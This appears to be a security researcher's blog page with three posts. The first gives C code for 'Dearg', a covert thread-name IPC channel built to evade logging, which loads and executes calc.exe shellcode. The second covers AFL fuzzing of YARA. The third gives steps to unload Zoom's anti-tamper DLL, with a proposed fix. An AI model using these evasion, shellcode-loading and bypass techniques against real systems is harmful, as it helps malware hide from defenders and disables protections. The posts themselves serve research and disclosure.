11 Feb 2021

Stealthy Process Communication Between Threads on Windows 10

Introduction

Whilst playing with a Cobalt Strike beacon, I was thinking of ways that the artefact kit could be improved in terms of IPC (“Inter-Process Communication”). The de facto standard is to use named pipes, typically as a way to read shellcode from inside a process we’ve injected into.

The new communication method won’t be observable by existing tools - the unusual IPC channel used will evade logging and audit/alarm based triggers.

Standard tooling won’t be able to pick up the transactions between the threads in the way that ProcMon (and similar tools) can for traditional Windows file operations. Because we abuse a rarely used feature as a custom IPC channel, purpose-built tooling would be needed to capture this traffic with the volume and granularity normally available for IPC data.

All we need to utilise this method is a HANDLE to the thread, with THREAD_QUERY_LIMITED_INFORMATION permissions. This access right also works on protected processes, whereas THREAD_QUERY_INFORMATION does not.

I’ve called this project Dearg, which means red in Gaelic. A GitHub project exists here with all of the code for the project. How the client speaks to a serving thread is briefly outlined below:

client

Technique

The technique relies on the fact that we can modify the ThreadName member within the ETHREAD structure. The ETHREAD structure contains information about a thread and is stored in kernel space. We can fetch information about a thread using the NtQueryInformationThread system call, or the friendlier user-mode API GetThreadDescription, and subsequently set information about a thread using NtSetInformationThread, or SetThreadDescription. I’ve attempted to make this technique follow a client <-> server model as much as possible, where the client fetches a buffer from another thread, and the server hosts it.

Using the handy ntdiff, we can see the difference between the ETHREAD structure in the last release of Windows 7 and in Windows 10 1607, in ntoskrnl.exe. ThreadName does not exist in Windows 7, so this technique can only be applied to Windows 10 1607 (which was released in 2016) and above.

/* 0x07c8 */ struct _UNICODE_STRING* ThreadName;

diff

This member is stored as a UNICODE_STRING object, the standard Windows structure for a Unicode string. We’re going to overwrite the Buffer field, the actual string, with the data we want to communicate to another thread. As mentioned above, this can be trivially accessed using standard APIs.

To access this field, at a minimum, we need one of the below permissions when getting a HANDLE to the target thread. We’ll take the “principle of least privilege” model - and opt for the lowest permission we can get away with, which is THREAD_QUERY_LIMITED_INFORMATION. It’s noteworthy that THREAD_QUERY_INFORMATION won’t work on protected processes, however the limited information class will.

THREAD_QUERY_INFORMATION (0x0040)	Required to read certain information from the thread object, such as the exit code (see GetExitCodeThread).

THREAD_QUERY_LIMITED_INFORMATION (0x0800)	Required to read certain information from the thread objects (see GetProcessIdOfThread). A handle that has the THREAD_QUERY_INFORMATION access right is automatically granted THREAD_QUERY_LIMITED_INFORMATION. Windows Server 2003 and Windows XP: This access right is not supported.

As this is a UNICODE_STRING buffer, by design, the buffer’s actual size is calculated by looking at the length of the string. In order for the data to be present within this buffer, and for the entire buffer to be returned when we make a fetch call to it, we need to ensure that it doesn’t contain a null-terminator (0x00 0x00). In an attempt to circumvent this, we’ll encode the data with a simple 1-byte XOR key until the null terminator does not exist within the buffer. To find this key, we’ll just keep incrementally encoding until we’ve got a sane buffer - we unfortunately won’t be able to serve the data to the client if we can’t eliminate the bytes.
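As a rough sketch of the key search described above (this is not the code from the Dearg repository), the helper below tries each 1-byte XOR key in turn and returns the first one that leaves no terminator in the encoded data. The names contains_double_zero and find_xor_key are hypothetical, and the sketch conservatively assumes that any two consecutive zero bytes count as a terminator, regardless of alignment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if buf, once XORed with key, would contain two consecutive
 * zero bytes (treated here as a wide-character terminator). */
int contains_double_zero(const uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if ((uint8_t)(buf[i] ^ key) == 0 && (uint8_t)(buf[i + 1] ^ key) == 0)
            return 1;
    }
    return 0;
}

/* Hypothetical helper: tries keys 0x00..0xFF in order and stores the first
 * one that leaves no terminator. Key 0x00 means "no encoding needed".
 * Returns 1 on success, 0 if no key works. */
int find_xor_key(const uint8_t *buf, size_t len, uint8_t *key_out)
{
    assert(buf != NULL && key_out != NULL);

    for (unsigned k = 0; k <= 0xFF; k++) {
        if (!contains_double_zero(buf, len, (uint8_t)k)) {
            *key_out = (uint8_t)k;
            return 1;
        }
    }
    return 0;
}
```

For the bytes 41 00 00 42, key 0x00 is rejected and 0x01 is the first key that works. A key only fails when two adjacent bytes in the data are both equal to it, so the search can only come up empty if every one of the 256 byte values appears as an adjacent pair somewhere in the data.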

Initially, I didn’t have a permission model set up for this trivial protocol. I’ve since defined one in which the server tells the client whether the data is writeable/readable. The client must respect the header’s permissions, as this isn’t implemented at a lower abstraction level (i.e. the Windows I/O permission model).

We’ll store this key in a packed header, along with a magic value at the start (so we can distinguish the serving thread from other threads), the length of the stored buffer, the data’s permissions, and a CRC32 checksum to ensure data integrity.

#define DEARG_HEADER_MAGIC 0x1337BEEF

typedef enum DEARG_FLAGS {
	DEARG_WRITE = 1,
	DEARG_READ = 2,
	DEARG_READWRITE = 3
} DEARG_FLAGS;

#pragma pack(push, 1)
typedef struct DEARG_HEADER {
	DWORD32 dwMagic;
	DEARG_FLAGS dfFlags;
	DWORD32 dwChecksum;
	UINT16 u16Len;
	BYTE bKey;
} DEARG_HEADER, *PDEARG_HEADER;
#pragma pack(pop)

In tests, I found that the maximum buffer we could store in the Buffer field was a little under USHRT_MAX bytes, likely a hard limit imposed under the hood in the kernel. So, the maximum amount we can store in this buffer is around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER). We need to do the following to construct our payload:

  1. Set the magic to our DEARG_HEADER_MAGIC value.
  2. Calculate the CRC32 hash of the data, set our dwChecksum header member.
  3. If the buffer contains the string terminator, loop from 0x0 to 0xFF trying to find a key that encodes our data to ensure the terminator doesn’t exist. Leave this value at 0 if we don’t need to encode.
  4. Construct the buffer, write the header, then write the encoded buffer.
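The steps above can be sketched in portable C as follows. This is only an illustration under stated assumptions, not the wrapper from the repository: sketch_header mirrors the packed DEARG_HEADER layout with fixed-width types, crc32_bytes and build_payload are hypothetical names, the checksum is assumed to be taken over the data before encoding, and the XOR key is assumed to have been chosen already.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKETCH_MAGIC 0x1337BEEFu

#pragma pack(push, 1)
typedef struct {
    uint32_t magic;     /* identifies a serving thread */
    uint32_t flags;     /* read/write permissions */
    uint32_t checksum;  /* CRC32 of the unencoded data (assumption) */
    uint16_t len;       /* length of the data after the header */
    uint8_t  key;       /* 1-byte XOR key, 0 if not encoded */
} sketch_header;
#pragma pack(pop)

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320), no lookup table. */
uint32_t crc32_bytes(const uint8_t *p, size_t n)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Writes header + XOR-encoded data into out.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_payload(uint8_t *out, size_t out_cap, const uint8_t *data,
                     uint16_t len, uint32_t flags, uint8_t key)
{
    sketch_header hdr;

    assert(out != NULL && data != NULL);
    if (out_cap < sizeof hdr + len)
        return 0;

    hdr.magic = SKETCH_MAGIC;
    hdr.flags = flags;
    hdr.checksum = crc32_bytes(data, len);
    hdr.len = len;
    hdr.key = key;

    memcpy(out, &hdr, sizeof hdr);
    for (size_t i = 0; i < len; i++)
        out[sizeof hdr + i] = (uint8_t)(data[i] ^ key);

    return sizeof hdr + len;
}
```

With this layout the packed header is 15 bytes, so a 4-byte payload produces a 19-byte buffer, which would then be handed to whichever API sets the thread name.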

To make this process easier, I’ve pushed a helper wrapper to GitHub here. You can plug this into your code at will. Other methodologies outlined below are included in the repository too!

Server

Our “server” will host the data, in a way which is described above. You can choose the main thread, or any other thread, to host the payload in ThreadName. For example, we can go ahead and host the data in the current thread. In this instance, we’re going to host a simple bit of x86 shellcode which executes calc.exe:

int main(int argc, char** argv)
{
	BYTE bShellcode[] = \
		"\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
		"\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
		"\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
		"\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
		"\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
		"\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
		"\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
		"\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
		"\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
		"\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
		"\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
		"\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
		"\x52\xff\xd0";

	// initialise the header
	DEARG_HEADER dHdr;
	if (!dearg_init_hdr(&dHdr))
	{
		return 0;
	}

	// attempt to serve the shellcode
	DEARG_STATUS dStatus = dearg_serve(GetCurrentThread(), DEARG_READ | DEARG_WRITE, &dHdr, bShellcode, sizeof(bShellcode));
	if (dStatus != DSERVE_OK)
	{
		switch (dStatus)
		{
		case DSERVE_ERROR_KEY:
			puts("failed to find a suitable key");
			break;

		case DSERVE_ERROR_SET:
			puts("failed to set the thread name");
			break;

		case DSERVE_ERROR_ALLOC:
			puts("a memory allocation failure occurred");
			break;

		case DSERVE_INVALID_PARAMS:
			puts("the parameters were invalid");
			break;
		}

		return 0;
	}

	printf("Serving %zu bytes of content on thread ID %lu using key 0x%X\n", sizeof(bShellcode), GetCurrentThreadId(), dHdr.bKey);
	return 1;
}

The dearg_init_hdr function initialises the header for us. The dearg_serve function then fills in the header, finds an appropriate key to encode the data (if needed), and sets the ThreadName.

Client

As the client, we somehow need to find the thread which is our server in this case. We can identify the thread that is hosting the data by reading the ThreadName, and checking for our magic 0x1337BEEF. After we’ve read the header, if we need write access, we need to re-open the handle with THREAD_SET_INFORMATION. Next, we read the length of the data in the u16Len member. After this, we read the data which is placed after the header and place it into a buffer. We then get a hash of the data, and compare it against the hash in the header - this ensures that the data we’re reading has not been tampered with.
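The client-side checks described above could look roughly like the sketch below, which works on a byte buffer that has already been fetched from the thread name. It is an illustration rather than the repository’s dearg_read: sketch_header, crc32_bytes, read_payload and the READ_* codes are hypothetical, and the checksum is assumed to cover the decoded data.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKETCH_MAGIC 0x1337BEEFu

enum { READ_OK = 0, READ_TOO_SHORT = -1, READ_BAD_MAGIC = -2, READ_BAD_CHECKSUM = -3 };

#pragma pack(push, 1)
typedef struct {
    uint32_t magic;
    uint32_t flags;
    uint32_t checksum;
    uint16_t len;
    uint8_t  key;
} sketch_header;
#pragma pack(pop)

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320). */
uint32_t crc32_bytes(const uint8_t *p, size_t n)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Validates the header, decodes the data into out, and verifies the CRC. */
int read_payload(const uint8_t *wire, size_t wire_len,
                 uint8_t *out, size_t out_cap, sketch_header *hdr)
{
    assert(wire != NULL && out != NULL && hdr != NULL);

    if (wire_len < sizeof *hdr)
        return READ_TOO_SHORT;
    memcpy(hdr, wire, sizeof *hdr);

    /* A thread without our magic is not serving anything. */
    if (hdr->magic != SKETCH_MAGIC)
        return READ_BAD_MAGIC;
    if (wire_len - sizeof *hdr < hdr->len || out_cap < hdr->len)
        return READ_TOO_SHORT;

    /* Undo the XOR encoding, then compare against the stored checksum. */
    for (size_t i = 0; i < hdr->len; i++)
        out[i] = (uint8_t)(wire[sizeof *hdr + i] ^ hdr->key);
    if (crc32_bytes(out, hdr->len) != hdr->checksum)
        return READ_BAD_CHECKSUM;

    return READ_OK;
}
```

Checking the magic before anything else means a scan over many threads can discard ordinary thread names cheaply, and only pays for the decode and CRC on likely candidates.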

The way in which you find the thread is totally up to the implementation: you could walk all the threads on the system, or pass the thread ID some other way. In the example below, we read shellcode from a thread with an ID of 1337, and execute the shellcode it is serving.

HANDLE hThread = OpenThread(THREAD_QUERY_LIMITED_INFORMATION, FALSE, 1337);
if (hThread == NULL) // OpenThread returns NULL on failure
{
	return FALSE;
}

DEARG_HEADER dHdr;
RtlSecureZeroMemory(&dHdr, sizeof(DEARG_HEADER));

// first, get the buffer size by reading the header
if (dearg_read(hThread, &dHdr, NULL, 0) != DSERVE_NO_DATA_OUT) 
{
	return FALSE;
}

// allocate the executable memory with the size from the header
LPVOID lpMem = VirtualAlloc(NULL, dHdr.u16Len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpMem == NULL)
{
	return FALSE;
}

// read in the data
if (dearg_read(hThread, &dHdr, lpMem, dHdr.u16Len) != DSERVE_OK) 
{
	return FALSE;
}

// execute the shellcode
((VOID(*)())lpMem)();

Conclusion

This method of communicating between processes could prove extremely useful when you want to communicate between processes under the radar. If anyone has any additions to this, feel free to get in touch with me, preferably via email: [email protected]

Limitations

The structure member within ETHREAD that we’re weaponising to communicate, ThreadName, only exists on Windows 10 1607 and higher.

Without the THREAD_QUERY_LIMITED_INFORMATION access for the target thread handle, you won’t be able to fetch the ETHREAD member.

There is no sort of exclusive lock implemented, unlike actual file objects on Windows.

We can have a maximum shellcode buffer size of around USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(DEARG_HEADER)

We need to ensure that a null terminator, \x00\x00, within the main body of UNICODE_STRING::Buffer does not exist. The wrapper attempts to find a key which satisfies this requirement.
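To put a number on the size limit above, here is a small worked calculation. It is a sketch under assumptions: sketch_unicode_string is a stand-in that only mirrors the documented field layout of UNICODE_STRING, max_payload_bytes is a hypothetical name, and the header size of 15 bytes assumes the packed DEARG_HEADER with a 4-byte enum.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in with the same field layout as UNICODE_STRING:
 * two 16-bit lengths followed by a pointer to the characters. */
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    uint16_t *Buffer;
} sketch_unicode_string;

/* USHRT_MAX - sizeof(UNICODE_STRING) - sizeof(header), as in the text. */
size_t max_payload_bytes(size_t header_size)
{
    assert(header_size + sizeof(sketch_unicode_string) <= USHRT_MAX);
    return (size_t)USHRT_MAX - sizeof(sketch_unicode_string) - header_size;
}
```

On a typical 64-bit build the stand-in structure is 16 bytes, so max_payload_bytes(15) comes to 65535 - 16 - 15 = 65504 bytes. The original figure is described as approximate, so treat this as an upper estimate rather than an exact kernel limit.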

windows red-team ipc dearg

10 May 2020

I’ve always been interested in fuzzing YARA to see if anything interesting would be produced. I didn’t manage to crash YARA when following the methodology that this post outlines whilst targeting the PE module, so it’d be great to hear recommendations on how the process I followed could be improved. We’ll be using the excellent american fuzzy lop (a.k.a. “AFL”) as the choice of fuzzer. If we were to find a parsing bug in YARA, it could possibly lead to code execution if a victim (in this case) runs our specially crafted executable through it. Fuzzing is a common method for finding vulnerabilities in software, in particular memory management vulnerabilities. It involves executing the target binary with various input values generated by the fuzzer, to test the program - the goal is to get it to crash.

YARA is a handy tool in the world of malware research. It enables researchers to classify files based on specific parameters such as a sequence of bytes, or format-specific attributes such as function imports in the Import Address Table (“IAT”). The aim of YARA rules is to identify files, for example to classify malware samples. It was developed by Victor Alvarez of VirusTotal (“VT”) specifically to identify families of malware. The YARA tool allows signature-based malware classification similar to AV products.

An example of a simple YARA rule to match a file which contains the ASCII string "YARA example" and the sequence of bytes 0xDE, 0xEA, 0xAD can be observed below.

rule Exemplar
{
    meta:
        description = "A simple example of a YARA rule"
        author = "LloydLabs"

    strings:
        $ = "YARA example"
        $ = {DE EA AD}

    condition:
        all of them
}

When developing YARA rules, I highly recommend installing the YARA extension for Visual Studio Code - which can be found here. We have three sections: a meta section which contains any sort of metadata; a strings section which contains the patterns to match; and the condition section, which is used to define the conditions for the rule.

I wanted to target the PE module within YARA, which provides functionality to parse PE-specific fields. An example of this is accessing the DllCharacteristics flag within the OptionalHeader within the PE structure. At the same time, the rule will also check if the PE is a DLL. The module makes easy work of this - below, we can observe how this would be written within the condition section:

import "pe"

rule Exemplar
{
    condition:
        pe.is_dll() and pe.dll_characteristics & pe.DYNAMIC_BASE
}

In YARA 4.0, multiple new additions were made to the already extremely handy module. I wanted to target the following functions, and make sure we would have complete coverage of them all when the rule was hit:

pe.pdb_path
pe.exports_index(..)
pe.export_details(..)
pe.dll_name
pe.export_timestamp

The rule language which YARA is based on is parsed using GNU Bison, an extremely mature parser generator which has been actively developed since the 1980s (not that this is any excuse). I thought time would be wasted targeting this aspect of YARA, and that the fuzzing efforts would be more successful when targeting the PE parser that they implement themselves. All of the functionality for YARA is contained within libyara; the command-line version of YARA simply uses this library. Here, we can see the code for the PE module. Here is an example of the code within, which is responsible for parsing the PDB path:

if (yr_le32toh(cv_hdr->dwSignature) == CVINFO_PDB20_CVSIGNATURE)
{
  PCV_INFO_PDB20 pdb20 = (PCV_INFO_PDB20) cv_hdr;

  if (struct_fits_in_pe(pe, pdb20, CV_INFO_PDB20))
    pdb_path = (char*) (pdb20->PdbFileName);
}
else if (yr_le32toh(cv_hdr->dwSignature) == CVINFO_PDB70_CVSIGNATURE)
{
  PCV_INFO_PDB70 pdb70 = (PCV_INFO_PDB70) cv_hdr;

  if (struct_fits_in_pe(pe, pdb70, CV_INFO_PDB70))
    pdb_path = (char*) (pdb70->PdbFileName);
}

If we want to test all of these features, we need to design a YARA rule which hits all of the code paths which result in these new features being tested. Below, we can see the route that we want to take.

Some of the functions accept different types of arguments (which can be seen in the documentation for the module), e.g. pe.exports_index supports a string (e.g. pe.exports_index("DllRegisterServer")) and also an ordinal (e.g. pe.exports_index(1337)). We can hit all of these conditions in a single rule by simply using or between all of the different checks. The rule I came up with when fuzzing YARA was:

import "pe"

rule Fuzzawuzza
{
    condition:
        pe.pdb_path == "FUZZ" or pe.dll_name == "FUZZ" or pe.imports(/kernel32.dll/i, /(Read|Write)ProcessMemory/) == 2 or pe.exports_index(/^[email protected]@/) or pe.exports_index(72) or pe.exports_index("CPlApplet") or pe.export_details.name == "FUZZ" or pe.export_timestamp == 1337
}

We’ll then go ahead and save this rule as test_rule.yar for use further down the line. The objective of fuzzing in this instance was to crash YARA, and my choice of fuzzer will be AFL by Google.

To do this we’ll feed AFL a legitimate PE binary which will be mutated and changed. First of all, as we have access to the source code of YARA due to it being open source, we need to instrument the binary. afl-gcc is a drop-in wrapper for GCC which injects instrumentation into the code that it is compiling. This way, the fuzzer can work out, based on the inputs that it gives the program, which code paths each input reaches. An example of this in the context of YARA could be the initial verification of the file having the MZ header: AFL would work out that an invalid header leads to fewer code paths and hence less coverage of the program as a whole, and this would then be reflected in the mutations that the fuzzer makes in the future. We could also fuzz without the source code, however having it makes the fuzzing a lot faster, as AFL can find relevant routes in the code to target as it mutates the input file.
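To make the MZ header example a little more concrete, here is a toy stand-in for a PE parser. It is emphatically not YARA’s code: toy_pe_depth is a hypothetical function that simply reports how many checks an input passed, which is a crude proxy for how much code a coverage-guided fuzzer would see that input reach.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy parser: returns 0 if the DOS header check fails, 1 if only the
 * "MZ" check passes, and 2 if the "PE\0\0" signature is also found. */
int toy_pe_depth(const uint8_t *buf, size_t len)
{
    assert(buf != NULL);

    /* Check 1: large enough for a DOS header and starts with "MZ". */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;

    /* e_lfanew: little-endian offset of the NT headers, stored at 0x3C. */
    uint32_t e_lfanew = (uint32_t)buf[0x3C]
                      | ((uint32_t)buf[0x3D] << 8)
                      | ((uint32_t)buf[0x3E] << 16)
                      | ((uint32_t)buf[0x3F] << 24);

    /* Check 2: the offset is in bounds and points at "PE\0\0". */
    if (e_lfanew > len || len - e_lfanew < 4)
        return 1;
    const uint8_t *nt = buf + e_lfanew;
    if (nt[0] != 'P' || nt[1] != 'E' || nt[2] != 0 || nt[3] != 0)
        return 1;

    return 2;
}
```

An input that breaks the first two bytes never gets past the first branch, so an instrumented build reports no new paths for it; mutations that keep the header intact go deeper and are more likely to be kept in the queue.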

First of all, we need a server. With the help of David Cannings, we managed to get a 16-core Google Cloud instance with 64GB of RAM. Fuzzing in the cloud isn’t always the most cost-efficient way to do it, however this was simply for a week. The distribution I’ll be using throughout this is Ubuntu 18.04.4 LTS (love it or hate it 😉). Next, we need to install AFL:

sudo apt install build-essential automake libtool make gcc pkg-config libssl-dev # this was a new box, we need this for make, etc.
wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
tar -xvf afl-latest.tgz
cd afl-*/ # the archive extracts to a versioned directory, e.g. afl-2.52b
make
sudo make install

Next, let’s go and grab the latest YARA release from GitHub (in this case, 4.0.0) and install it. We’ll build it with afl-gcc, which will instrument it ready to be fuzzed by afl-fuzz.

# Pull down YARA
wget https://github.com/VirusTotal/yara/archive/v4.0.0.tar.gz
tar -xvf v4.0.0.tar.gz
cd yara-4.0.0

# Set our default compiler in the current env to afl-gcc
export CC=afl-gcc

# Install YARA
./bootstrap.sh
./configure
make
sudo make install

# For some reason, libyara isn't found, so we add its directory to the dynamic linker's search path
echo "/usr/local/lib" | sudo tee -a /etc/ld.so.conf
sudo ldconfig

We now have YARA setup on our machine:

$ yara -v
4.0.0

AFL documents some performance tips here, which I applied to the current instance in order to maximise the efficiency when fuzzing. It doesn’t really matter in terms of anything else, as this instance is simply for fuzzing. Looking at the AFL documentation, the following command line arguments are given as a boilerplate:

./afl-fuzz -i testcase_dir -o findings_dir /path/to/program @@ [..params..]

OK, so in our case we need a PE file in our input (-i) directory, and our /path/to/program needs to be simply yara. The @@ denotes where AFL substitutes the path of the mutated PE file that it is using to fuzz YARA. We’ll just take the classic calc.exe from Windows to base the mutations on.

YARA takes the following arguments when it wants to scan a file:

yara [rule] [file_path]

Our rule, as mentioned above, has already been configured and is saved as test_rule.yar. So, putting this together we get:

mkdir yara_in # Input directory
cp calc.exe yara_in/ # Seed file that AFL will mutate
afl-fuzz -i yara_in -o yara_out yara test_rule.yar @@

Now, AFL has started, and we’ve got this screen:

What, 203.9 executions per second seems a bit slow for a 16 core machine. Let’s go check htop, and see if all of the cores are being used:

OK, not at all. It’s only using one core, which is strange. I thought at first AFL would utilise all of the resources on the system unless told otherwise, but looking at the documentation it says:

Every instance of afl-fuzz takes up roughly one core. This means that on multi-core systems, parallelization is necessary to fully utilize the hardware. For tips on how to fuzz a common target on multiple cores or multiple networked machines, please refer to Tips for parallel fuzzing.

I came across a tool named afl-launch on GitHub here, which allows us to easily launch multiple fuzzers in parallel. Since AFL uses about one core per instance, we’ll want to spin up 16 instances of it. It requires Go, so let’s set it up:

sudo apt install golang-go
go get -u github.com/bnagy/afl-launch

Now we’ve set up afl-launch for our user, we need to execute it. Rather than the output directory used when running a single instance of AFL, the directory here is called a sync directory, whose subdirectories belong to the AFL instances running in parallel.

afl-launch -n 16 -i yara_in -o yara_out yara test_rule.yar @@

Finally, we’re using all of the cores that are available at our disposal:

When running a single instance of AFL we get the status screen shown above, but this isn’t available when fuzzing in parallel. Luckily, afl-whatsup exists. Running this tool and pointing it at our sync directory will show the status of all of the fuzzers. We’ll execute it through watch, which re-runs the command every 2 seconds by default - giving us somewhat of a live update of the status.

watch afl-whatsup yara_out

If you want to pause the fuzzing process across all of your instances, I’d recommend using afl-pause from afl-trivia by Ben Nagy. He’s developed a bunch of awesome scripts which can help you control your AFL instances when they’re running in parallel. To pause the fuzzing process, all you need to do is run his pause script: afl-pause <sync_directory>.

During the fuzzing process, as mentioned, AFL will mutate our input file and craft it based on the best route through the program it can find. The process, as detailed in their README.md, goes along the lines of:

Unfortunately, after 1.2 billion executions of YARA, we failed to crash it. So, kudos to the YARA development team and for all of their hard work over the years maintaining such a staple of a tool! I hope this wasn’t too boring and gave you a small introduction to the world of fuzzing, and things you may come across when setting up your fuzzing environment.

Future Work

To demonstrate fuzzing techniques at a later stage, I am going to work on a project named Damn Vulnerable File Parser - a very vulnerable (hence the name), file parser written in C to demonstrate with ease how programs can be fuzzed and lead to them crashing. We could also target older versions of YARA, which are likely to still be in use by organisations and fuzz to find crashes which haven’t already been patched in those versions.

I’m new to using AFL, and fuzzing YARA-like projects in general - if there’s anything that I could’ve changed in my approach in fuzzing YARA please let me know! I’m contactable on Twitter or at [email protected]. I’d be happy to take on any recommendations!

re yara

03 Apr 2020

Introduction

This quick blog post highlights some of the flaws found in the Zoom application when attempting to do integrity checking. These checks verify that the DLLs inside the folder are signed by Zoom and also that no 3rd party DLLs are loaded at runtime. We can trivially disable the DLL that performs these checks, by replacing it with our own or simply unloading it from the process.

This post highlights how we can bypass Zoom’s anti-tampering detection, which aims to stop DLLs from being loaded or existing ones modified. The functionality is all implemented by Zoom themselves within a DLL named DllSafeCheck.dll.

I have also included a YARA rule at the end of this blog post, in case this technique is used by an adversary in the future.

I’ll cover these flaws:

  • The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL.
  • Ironically, while all the DLLs checked by the anti-tampering DLL MUST have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLL’s own integrity and signing status are NOT checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL.

Zoom Client

Zoom is entirely programmed in C++ and makes heavy use of the Windows API. The executable and the DLLs that are used are installed to %APPDATA%\Zoom\bin, which is completely writeable. All of the executables that are used are signed by Zoom themselves, as we can see below when extracting the certificate.

PS AppData\Roaming\Zoom\bin_00> Get-PfxCertificate util.dll

Thumbprint                                Subject
----------                                -------
0F9ADA46756C17EFFFD467D10654E2A766566CB3  CN="Zoom Video Communications, Inc.", O="Zoom Video Communications, Inc.", L=San Jose, S=California, C=US, SERIALNUMBER=4969967, OID.2.5.4.15=Pr...

Most of the functionality within Zoom resides within the DLLs. Below, we can see the DLLs which are listed in the import table. Take notice of DllSafeCheck.dll; this is the library we will be analysing.

Looking further at the use of DllSafeCheck.dll, we can see that it exports a function named HackCheck.

If we then cross-reference the calls to this function using our favourite disassembler, IDA in this instance, we can see that it is called at the entry point of the program within WinMain before any other operations are completed. Below, we can see the function prologue and the immediate call to HackCheck.

DllSafeCheck.dll

As mentioned above, the Zoom client will call the HackCheck function (which is the only export from the DLL, apart from DllMain) upon execution. Two events are created to detect the loading and unloading of DLLs, registered by resolving LdrRegisterDllNotification and LdrUnregisterDllNotification.

To start, the export verifies that it is not running on an old version of Windows, using a mixture of VerSetConditionMask and VerifyVersionInfoW. After the Windows version has passed these checks, it will continue execution. It then will gather the Windows process token information through the usual means of getting a handle for the current process, then calling GetTokenInformation. This data is then saved for further use.

A path to Zoom’s %APPDATA% folder is then constructed, and a log file named dllsafecheck.txt is created. A thread is then created, which waits for log events to be sent to it. Below, we can see the creation of this file.

We then get to the core functionality of the DLL, which is scanning the modules which are loaded in the current process and making sure that they’re signed by Zoom. It will gather a list of the modules, and then check to see if they are signed. Below, we can see the enumeration of the certificate chain to check against the hardcoded Zoom Video Communications, Inc. string.

if ( v10->csCertChain )
{
    do
    {
        v12 = WTHelperGetProvCertFromChain(v10, v11);
        if ( !v12 )
            break;
            
        v13 = v12->pCert;
        if ( v13 )
        {
            v15 = CertGetNameStringW(v13, 4u, 0, 0, 0, 0); // get alloc len
            v16 = v15;
            if ( v15 )
            {
                v14 = HeapAlloc(NULL, 0, 2 * v15);
                if ( v14 )
                {
                    v20 = 0;
                    do
                    {
                        v14[v20++] = 0;
                    }
                    while (v20 < (2 * v15));

                    if (!CertGetNameStringW(v13, 4u, 0, 0, (LPWSTR)v14, v16))
                    {
                        HeapFree(NULL, 0, v14);
                        v14 = 0;
                    }
                }

                v10 = v26;
            }
            else
            {
                v14 = 0;
            }
        }
        else
        {
            v14 = 0;
        }

    if ( !v25 )
        v25 = L"Zoom Video Communications, Inc.";

If a module is not signed by Zoom, the user is prompted to choose whether it should be allowed to run in the process.

Trivial to unload from process

Ironically, while all the DLLs checked by the anti-tampering DLL must have a valid Microsoft Authenticode signature to pass the checks, the anti-tampering DLL’s own integrity and signing status are not checked at all. This seems like an oversight from the Zoom developers considering all the checks that are currently performed in the DllSafeCheck DLL.

An immediate issue is that this DLL can be trivially unloaded, rendering the anti-tampering mechanism null and void. The DLL is not pinned, meaning an attacker from a 3rd party process could simply inject a remote thread, and call FreeLibrary after getting a handle to the DLL.

One possible fix for this would be to call GetModuleHandleExA, passing in the GET_MODULE_HANDLE_EX_FLAG_PIN flag. This ensures that the module stays loaded within the process until it terminates, rendering FreeLibrary calls useless.

HMODULE hSafeCheck = NULL;
if (GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_PIN, "DllSafeCheck.dll", &hSafeCheck))
{
    // Loaded module successfully
}

We can unload it using the traditional, and well-documented, method of:

  1. Get a HANDLE to the Zoom process using OpenProcess.
  2. Enumerate the loaded modules in the process, using EnumProcessModules, and find a handle to DllSafeCheck.dll.
  3. Resolve the address of “FreeLibrary” using GetProcAddress.
  4. Create a thread in the process using CreateRemoteThread, with the starting routine as the FreeLibrary address, and the parameter as the handle to DllSafeCheck.
  5. The anti-tampering DLL is now unloaded.
